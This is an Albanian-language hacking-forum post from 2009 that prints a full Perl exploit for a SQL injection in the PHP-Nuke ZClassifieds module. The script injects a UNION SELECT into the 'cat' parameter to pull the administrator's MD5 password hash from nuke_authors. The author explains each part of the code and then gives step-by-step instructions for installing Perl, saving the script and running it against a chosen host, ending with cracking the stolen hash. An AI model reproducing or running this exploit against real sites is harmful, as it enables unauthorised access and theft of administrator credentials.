(((...Www.HkT-CreW.Team-Talk.NeT...)))
 
ForumCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Shpjegimi dhe perdorimi Nji lloi exploitit.

Shiko temën e mëparshme Shiko temën pasuese Shko poshtë 
AutoriMesazh
Red-Dragon
b00mb3r
b00mb3r
avatar

Numri i postimeve : 139
Join date : 25/04/2009
Location : C:/

MesazhTitulli: Shpjegimi dhe perdorimi Nji lloi exploitit.   Mon Apr 27, 2009 11:03 pm

Kodi:
#!/usr/bin/perl
use Getopt::Std;
use LWP::UserAgent;

sub usg{
printf("


  -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
  |  PHP-NUKE  ZClassifieds  [cat] => SQL Injection  |
  -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
  #######################################################
  # Bug by Lovebug Exploit-Code by *b00mb3r* from Hkt-Crew #
  #######################################################
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                    USAGE:                          |#:
:#|        exploit.pl -h [Hostname]  -p [Path]        |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                  EXAMPLE:                          |#:
:#|    exploit.pl -h http://site.com -p /php-nuke/    |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#


");
}
sub problem{
    print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
    exit();
}
sub exploitation{
   
    $conn = LWP::UserAgent -> new;
    $conn->agent('Checkbot/0.4 ');
    $query_pwd = $host.$path."modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/**";
    $return_pwd = $conn->get($query_pwd) || problem();
    $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
    print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
  }

getopts(":h:p:U:",\%args);
    $host = $args{h} if (defined $args{h});
    $path = $args{p} if (defined $args{p});
   
   
    if (!defined $args{h} || !defined $args{p}){
        usg();
    }
    else{
        exploitation();
    }


Po i kerkon shume gati gjerat e di! ?----|-----!!------"-" 0_0 ?
Edhe ne rradhe te pare duhet te mesosh SQL qe nuk ke asnji justifikim per me than sepse kam postuar tek GJUHE PROGRAMUESE se si ta perdorim SQL dhe sql injection ka te beje pikerisht me GJUHEN SQL DHE DATABAZAT!
#############################################
Tani po ta sberthej ate exploit , dhe po te paralajmeroj qe duhet te kaloni ne shume HAPA te tjera para se te perdorni EXPLOITA °-°
#############################################
Si fillim, gjeja e pare qe shikohet eshte se c'fare exploiti eshte, dhe ku perdoret pra per c'fare plataforme perdoret , a eshte per server, a eshte per kompiutera, a eshte ndonji DDOS apo mo eshte per ndonji web aplikacion ! dhe PHP-NUKE ne kete rast nuk me duket as server lolz dhe as lloj sistemi operativ,
Nese ke dyshime kontrollo ne google
Ne kete rast kemi te bejm me nji exploit per php-nuke dhe si c'do exploit edhe ky eshte i bazuar ne BUGGGGGG i cili ndodhe ne KARTELEN (MODULIN) ZClassifieds i lloit[CAT] dhe tani besoj e kuptove pse exploiti quhet PHP-Nuke Module ZClassifieds [cat] SQL Injection Exploit
Kalojm tani tek ndertimi i exploitit....


Kodi:
#!/usr/bin/perl
use Getopt::Std;
use LWP::UserAgent;

sub usg{
printf("

Me ate te paren lol !/usr/bin/perl e kuptojm menjehere qe eshte ne perl si exploit dhe ai xhaxhi qe e ka bere exploitin si fillim ka caktuar librarit qe do fusi ne exploit te cilat jane
use Getopt:td; dhe use LWP::UserAgent; (per browserin)
Dhe normalisht per te ndihmuar ata qe nuk ja kane idene exploitit ka bere edhe nji USAGEEEEE aty dhe i ka dhene urdher PRINT qe eshte e njejt me ECHO tek php
dhe te ka dhene keto udhezimeee.

Kodi:
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
  |  PHP-NUKE  ZClassifieds  [cat] => SQL Injection  |
  -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
  #######################################################
  # Bug by Lovebug Exploit-Code by *b00mb3r* from Hkt-Crew #
  #######################################################
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                    USAGE:                          |#:
:#|        exploit.pl -h [Hostname]  -p [Path]        |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                  EXAMPLE:                          |#:
:#|    exploit.pl -h http://site.com -p /php-nuke/    |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#


Tani, ky eshte nji sql injection exploit dhe si c'do sql injection exploit ka edhe kodin inject i cili eshte SQL dhe me saktesisht kodi sql injection ne kete rast eshte:

Kodi:
-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/**";

Ku ndodhet bug ?
Bug, ndodhet ne kete direktori

Kodi:
modules.php?name=ZClassifieds&cat=

Pra pikerisht tek nji nga modulet qe ne rastin tone quhet ZClassifieds&cat=...
Pjesa kryesore e exploitave eshte Bug, dhe exploit, pra sepse te mos harrojm
C'DO EXPLOIT ESHTE I BAZUAR NE NJI BUG.
C'DO EXPLOIT NUK KA BRIRE POR ESHTE THJESHT NJI PROGRAM, PRA APLIKACION QE BEN NJIE "GJE" TE CAKTUAR NGA PROGRAMUESI
Vazhdojm tani me pjesen tjeter te exploitit..

Kodi:
}
sub problem{
    print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
    exit();

Ky tani thote, nese ka problem koneksioni, ose me sakt, webi qe keni zgjedhur nuk eshte ai lloj php-nuke ka krijuar programit nji (sub problem) ne kete rast nese webi nuk eshte i vullnetshem print (webi jo i vullnetshem) exit()
Tani te kalojm tek pjesa me e rendesishme e exploitit

Kodi:
}
sub exploitation{
   
    $conn = LWP::UserAgent -> new;
    $conn->agent('Checkbot/0.4 ');
    $query_pwd = $host.$path."modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/**";
    $return_pwd = $conn->get($query_pwd) || problem();
    $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
    print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
  }

Explotimi (thot)
$conn = LWP etce etc po thot me ba nji koneksion dhe i keni edhe agent, useragent... pastaj ajo ku behet sql injection eshte rreshti i 3 ku thote $query_pwd = $host.$path te cilat jane variabila te "define" me perpara, dhe egzekuton sql injection e cila eshte po e perserisim

Kodi:
"modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/**";

Pas kesaj ka futur disa "return" nqs ka probleme gjate exploitit dhe ka vendosur PRINT ; print e cia c'fare ka per te na printuar????
Ka per te na printuar nd5 hashin e user_id == 1 dhe ne rastin tone eshte ADMIN!

Kodi:
print "\n \[~\] Admin Password(md5)=$user_id is: $1

Ky pra ishte edhe exploiti, pjesa tjeter eshte kontorrno lolz
Kalojm tani tek PERDORIMI!
Ky eshte nji exploit ne perl dhe sic e dime , shumica perdorin windows dhe ju duhet active perl qe te keni mundesi per te njohur filet perl pra qe kan extension .pl
Active perl mund ta shkarkoni ketu
http://downloads.activestate.com/Act...SWin32-x86.msi

Dhe mbasi e instaluat ne kompiuter ashtu sic instaloni c'do program normal , mund ta perdorni exploitin..
Si ?
E merrni kodin me siper , pra kodin e exploiti dhe i beni paste ne notepad, apo notepad++,, varet c'fare perdorni, dhe pastaj shkoni
FILE==>>>SAVE ASS====>>>>>Do ti jepni nji emer psh exploit.pl dhe kujdesuni qe extensioni te jete .pl dhe jo ndonji tjeter lolz...
Tani vjen pika kryesore lolz, sepse nuk duhet qe ta mbyllni direkt, por posht barit ku shkruat emrin, (exploit.pl) keni edhe nji pjesez tjeter, ku thuhet save as txt file ???? ju do i thoni JO dhe keni per te klikuar aty dhe do i thoni:
SAVE ALL THE FILES
Dhe ka per tju dale ne vendin ku caktuat te beni save edhe exploiti ne perl..
PAstaj
Shkoni
Start>>>>>RUN>>>>>CMD dhe keni per te shkruajtur vendndodhjen e exploitit psh, po e zeme se exploiti ndodhet ne desktop
Dhe zakonisht kur hapet ms-dos ju ndodheni ne C:\users\b00mb3r
Atehere u jap nji [dir] dhe do te na orjentoj duke na hapur kartelat qe ndodhen ne direktorin qe ndodhemi dhe pas kesaj shikojm qe edhe desktop e kemi afer lolz, dhe i japim kete komand per te shkuar ne desktop
cd Desktop :p
MBas kesaj japim perseri "dir" dhe kemi per te pare edhe failin exploit.pl
Per ta egzekutuar aty ku jemi japim :
exploit.pl
Dhe ka per tu egzekutuar exploiti..
Per ta perdorur pastaj, i keni udhezimet e exploitit aty.. i thote vet...
JA rasti yne...

Kodi:
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                    USAGE:                          |#:
:#|        exploit.pl -h [Hostname]  -p [Path]        |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#

Dhe per ta perdorur ne do te japim
exploit.pl [hosti psh www.web.com] -p [path qe do te thote direktorija qe eshte e vullnetshme dhe ne rastin tone eshte modules.php] dhe japim
[ENTER] dhe ne momentin qe japim enter, exploiti do te egzekutohet dhe nese ka dale me sukses do te na nxjerri ne ms-dos hashin e passwordit te adminit, te cilin na takon neve qe ta krakojm !
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Shpjegimi dhe perdorimi Nji lloi exploitit.
Shiko temën e mëparshme Shiko temën pasuese Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
(((...Www.HkT-CreW.Team-Talk.NeT...))) :: Hacking :: Exploit-
Kërce tek: